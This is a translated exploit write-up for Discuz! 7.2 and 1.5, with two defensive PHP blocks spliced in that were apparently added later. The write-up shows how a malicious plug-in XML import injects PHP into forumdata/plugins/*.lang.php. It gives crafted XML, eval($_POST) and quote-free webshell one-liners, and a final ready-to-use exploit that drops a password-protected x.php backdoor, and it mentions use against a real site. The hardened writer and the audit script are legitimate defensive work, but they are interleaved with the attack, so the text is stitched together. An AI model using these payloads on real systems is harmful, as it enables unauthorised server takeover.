Dz7.2 & 1.5: getting a shell from the admin background [not the ucenter method, founder not required]

Source: Internet
Author: User

This is not the ucenter or manyou plug-in vulnerability, and it is not the founder-only method.
6.0 and 7.0 won't be covered. Let's start with 7.2 first.
At the end of the article, base64_encode(serialize($a)) can be used to get a webshell.
I tried for a long time and got hold of a 7.2 admin background to test on.
The method is to add an XML file through the plug-in import.
This XML works for both 7.2 and 1.5.

<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="Title"><![CDATA[Discuz! Plugin]]></item>
<item id="Version"><![CDATA[7.2]]></item>
<item id="Time"><![CDATA[]]></item>
<item id="From"><![CDATA[Discuz! Board (http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item>
<item id="Data">
<item id="plugin">
<item id="available"><![CDATA[0]]></item>
<item id="adminid"><![CDATA[0]]></item>
<item id="name"><![CDATA[www]]></item>
<item id="identifier"><![CDATA[shell]]></item>
<item id="description"><![CDATA[]]></item>
<item id="datatables"><![CDATA[]]></item>
<item id="directory"><![CDATA[]]></item>
<item id="copyright"><![CDATA[]]></item>
<item id="modules"><![CDATA[a:0:{}]]></item>
<item id="version"><![CDATA[]]></item>
</item>
<item id="version"><![CDATA[7.2]]></item>
<item id="language">
<item id="scriptlang">
<item id="a"><![CDATA[B]]></item>
<item id=");phpinfo();?>"><![CDATA[x]]></item>
</item>
</item>
</item>
</root>
After the file is uploaded, a shell.lang.php file is generated in the forumdata/plugins folder.
Its content is as follows:

<?php
$scriptlang['shell'] = array(
'a' => 'B',
');phpinfo();?>' => 'x',
);

?>
See, the `;phpinfo();?>` statement was written out normally together with the header.
Accessing shell.lang.php displays phpinfo normally. Since this can be written, a shell is certainly achievable.
Then try writing a one-liner directly.
Replace `;phpinfo();?>` with `;@eval($_POST['adm1n']);?>` and try again.
The upload result is as follows (screenshot not preserved):

Seeing the `''`, it is clear that the quotes have been replaced with an added escape. Open the source file and look:

<?php
$scriptlang['shell'] = array(
'a' => '=> 1); @eval($_POST['admin163']);?> ")?> ',
);

?>
Something is added in front of single quotes, which invalidates the payload. So try another one-liner that uses no single quotes at all.
Use this one:

<?php ($_=@$_GET[admin163]).@$_($_POST[org])?>

Open shell.lang.php directly: a blank page is displayed, which should mean success.
Can the one-liner's address be used directly? Entering `?adm1n=assert` displays:
")?> ',);?>
This shows the closure takes effect and it runs perfectly.
The source code of the file is as follows:

<?php
$scriptlang['shell'] = array(
'a' => '=> 1); ($_=@$_GET[admin163]).@$_($_POST[org])?> ")?> ',
);

?>

Put together, a perfect one-liner:
<?php ($_=@$_GET[adm1n]).@$_($_POST[org])?>
Successfully connected with the one-liner client...
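The root cause this walkthrough demonstrates is that the plug-in import takes each scriptlang key and its CDATA value from the uploaded XML and concatenates them into PHP source, escaping only the single quote, so a quote-free value closes the array literal and becomes code. Below is an added example of how such a writer can be hardened; it is not Discuz! code and not code from this post, and the function names, the XPath layout and the plug-in directory path are assumptions that mirror the XML shown above.

```php
<?php
// Added example (not Discuz! code): a hardened writer for the generated
// forumdata/plugins/<identifier>.lang.php file. Assumed root cause, as the
// post describes it: the importer copies each <item id="..."> key and its
// CDATA value straight into PHP source, and escaping only the single quote
// leaves a quote-free value such as
//   => 1); phpinfo();?>
// free to close the array literal and become code. The writer below never
// concatenates untrusted text into source: it validates the identifier and
// emits the array with var_export(), so every key and value is a quoted,
// escaped string literal no matter what it contains.

// The identifier becomes the file name and the array index, so restrict it
// to a conservative character set (this also rules out path traversal).
function validate_identifier(string $identifier): string
{
    if (!preg_match('/^[a-z0-9_]{1,40}$/', $identifier)) {
        throw new InvalidArgumentException('invalid plug-in identifier');
    }
    return $identifier;
}

// Pull the scriptlang key/value pairs out of the import XML. The layout
// mirrors the export shown in the post; keys and values are treated as
// opaque strings because the writer below makes any string safe.
function parse_scriptlang(string $xml): array
{
    libxml_use_internal_errors(true);
    // LIBXML_NONET: an untrusted upload must not trigger network fetches.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    if ($doc === false) {
        throw new InvalidArgumentException('malformed plug-in XML');
    }
    $items = $doc->xpath('/root/item[@id="Data"]/item[@id="language"]/item[@id="scriptlang"]/item');
    $entries = [];
    foreach ($items ?: [] as $item) {
        $entries[(string) $item['id']] = (string) $item;
    }
    return $entries;
}

// Build the PHP source for the lang file. var_export() single-quotes each
// string and escapes backslashes and quotes inside it, so ');', '?>' or
// '$_POST' in a key or value stay inside the literal. No closing ?> is
// emitted, so nothing can follow the assignment.
function build_lang_file(string $identifier, array $entries): string
{
    $identifier = validate_identifier($identifier);
    $strings = [];
    foreach ($entries as $key => $value) {
        $strings[(string) $key] = (string) $value;
    }
    return "<?php\n"
        . '$scriptlang[' . var_export($identifier, true) . '] = '
        . var_export($strings, true) . ";\n";
}

// Write the file under the plugins directory, with the path derived only
// from the validated identifier. $pluginsDir is an assumed parameter.
function write_lang_file(string $pluginsDir, string $identifier, array $entries): string
{
    $path = rtrim($pluginsDir, '/') . '/' . validate_identifier($identifier) . '.lang.php';
    if (file_put_contents($path, build_lang_file($identifier, $entries), LOCK_EX) === false) {
        throw new RuntimeException("cannot write $path");
    }
    return $path;
}

// Constructed sample input: the breakout value from the post, placed in the
// scriptlang item "a". With the writer above it ends up as a harmless literal.
$sampleXml = <<<'XML'
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="Data">
<item id="language">
<item id="scriptlang">
<item id="a"><![CDATA[=> 1); phpinfo();?>]]></item>
</item>
</item>
</item>
</root>
XML;

echo build_lang_file('shell', parse_scriptlang($sampleXml));
```

Run it with `php writer.php`: the value from the sample is emitted as a single-quoted, escaped string inside the array, and because the generated file ends right after the `;` there is no trailing `?>` for an injected value to reach. The same var_export() approach should be applied to every place the importer turns uploaded data into PHP source, not only scriptlang.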
-------
Let me say a bit more here. It was an accident; how could it be changed so easily...
At that time I had taken the site, and this wasn't enough. I hadn't tested on other dz7.2 sites and couldn't look at the source code... In addition, PHP did not return any error. I had no idea what was going on, and I didn't know whether it was the single quotes, because I tried a variety of single-quote and no-quote variants... none of them worked... attempts to create a file and write a one-liner failed. (admin163.net Micro-Forum)
The AV-evasion problem was also considered. base64_encode(serialize($a)) was tried in a variety of ways... This directory can generate the shell.lang.php file, which shows it is writable, so there was no non-writable problem... At that time I really wanted to bang my head against the wall... Finally I used

<?php fputs(fopen("x.php","a"),"a")?>

and a character like that was written...
This article has already been written at such length; rewriting it is troublesome...
------
In addition, 1.5 is the same as above...
Here is a general exp...

<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="Title"><![CDATA[Discuz! Plugin]]></item>
<item id="Version"><![CDATA[7.2]]></item>
<item id="Time"><![CDATA[]]></item>
<item id="From"><![CDATA[Discuz! Board (http://www.2cto.com/Discuz_7.2_SC_UTF8/upload/)]]></item>
<item id="Data">
<item id="plugin">
<item id="available"><![CDATA[0]]></item>
<item id="adminid"><![CDATA[0]]></item>
<item id="name"><![CDATA[www]]></item>
<item id="identifier"><![CDATA[adm1n]]></item>
<item id="description"><![CDATA[]]></item>
<item id="datatables"><![CDATA[]]></item>
<item id="directory"><![CDATA[]]></item>
<item id="copyright"><![CDATA[]]></item>
<item id="modules"><![CDATA[a:0:{}]]></item>
<item id="version"><![CDATA[]]></item>
</item>
<item id="version"><![CDATA[7.2]]></item>
<item id="language">
<item id="scriptlang">
<item id="a"><![CDATA[=> 1); fputs(fopen("x.php","w"),"<?eval($_POST[f4ck]);?>]]></item>
</item>
</item>
</item>
</root>
Upload the plug-in directly, then open
forumdata/plugins/adm1n.lang.php
directly. The file will generate a one-liner trojan x.php with the password f4ck in the same directory.
That's all. Embarrassing. I'll wait and think about it more later...
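For anyone responsible for a Discuz! 7.2 or 1.5 forum, the artefacts this post leaves behind are concrete: a *.lang.php under forumdata/plugins whose array contains code fragments, and a stray x.php dropped beside it. The following is an added audit script, not Discuz! code and not from this post; it assumes only what the post shows about the shape of a legitimate lang file (one assignment of an array literal of string keys and string values), and the directory path it takes on the command line is an assumption.

```php
<?php
// Added example (not Discuz! code): an audit script for the generated
// forumdata/plugins/*.lang.php files and their directory. A legitimate lang
// file, as the post shows, is one assignment of an array literal with string
// keys and string values and nothing else. The script runs each file through
// PHP's own tokenizer and reports anything that cannot occur in that shape,
// checks string literals for PHP tags, request superglobals or calls to
// code-execution and file-writing functions (a value that stays inside a
// single-quoted literal, like the one the post ends up with, would otherwise
// tokenize cleanly), and reports any .php file that is not a *.lang.php.

// Tokens a well-formed lang file may consist of.
const LANG_FILE_TOKENS = [
    T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT,
    T_VARIABLE, T_ARRAY, T_DOUBLE_ARROW, T_CONSTANT_ENCAPSED_STRING,
];
const LANG_FILE_CHARS = ['[', ']', '=', '(', ')', ',', ';'];

// Content that has no business inside a translation string.
const SUSPICIOUS_LITERAL = '/<\?|\?>|\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b|'
    . '\b(?:eval|assert|system|passthru|shell_exec|exec|fopen|fputs|fwrite|'
    . 'file_put_contents|base64_decode)\s*\(/i';

// Return the list of findings for one file's source; empty means it looks
// like a plain lang file.
function audit_lang_source(string $source): array
{
    $findings = [];
    $openTags = 0;
    foreach (token_get_all($source) as $token) {
        if (is_string($token)) {
            if (!in_array($token, LANG_FILE_CHARS, true)) {
                $findings[] = "unexpected character token '$token'";
            }
            continue;
        }
        [$id, $text, $line] = $token;
        if ($id === T_OPEN_TAG) {
            if (++$openTags > 1) {
                $findings[] = "second PHP open tag on line $line";
            }
        } elseif ($id === T_INLINE_HTML) {
            if (trim($text) !== '') {
                $findings[] = "content outside PHP tags on line $line";
            }
        } elseif ($id === T_VARIABLE && $text !== '$scriptlang') {
            $findings[] = "unexpected variable $text on line $line";
        } elseif ($id === T_CONSTANT_ENCAPSED_STRING && preg_match(SUSPICIOUS_LITERAL, $text)) {
            $findings[] = "suspicious content in string literal on line $line: " . trim($text);
        } elseif (!in_array($id, LANG_FILE_TOKENS, true)) {
            $findings[] = sprintf("unexpected %s '%s' on line %d", token_name($id), trim($text), $line);
        }
    }
    return $findings;
}

// Audit every PHP file in the plugins directory: *.lang.php files are
// tokenized, any other .php file is reported outright.
function audit_plugins_dir(string $dir): array
{
    $report = [];
    foreach (glob(rtrim($dir, '/') . '/*.php') ?: [] as $path) {
        $name = basename($path);
        if (substr($name, -9) !== '.lang.php') {
            $report[$name] = ['unexpected PHP file in plugins directory'];
            continue;
        }
        $findings = audit_lang_source((string) file_get_contents($path));
        if ($findings) {
            $report[$name] = $findings;
        }
    }
    return $report;
}

// Constructed samples: a clean file in the shape the post shows, and a file
// carrying the post's breakout string.
$clean = <<<'SRC'
<?php
$scriptlang['shell'] = array(
'a' => 'B',
);
?>
SRC;

$tampered = <<<'SRC'
<?php
$scriptlang['shell'] = array(
'a' => '=> 1); phpinfo();?> ")?> ',
);
?>
SRC;

foreach (['clean' => $clean, 'tampered' => $tampered] as $label => $src) {
    $findings = audit_lang_source($src);
    echo $label, ': ', $findings ? implode('; ', $findings) : 'no findings', "\n";
}
if (isset($argv[1])) {
    print_r(audit_plugins_dir($argv[1]));
}
```

Run it as `php audit.php /path/to/forumdata/plugins` after checking the two built-in samples. Because the plug-in import itself writes into this directory, the directory has to stay writable, so an audit like this (or a file-integrity monitor on forumdata/plugins) is the control that catches a malicious import after the fact; restricting who can import plug-ins is the control that prevents it.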
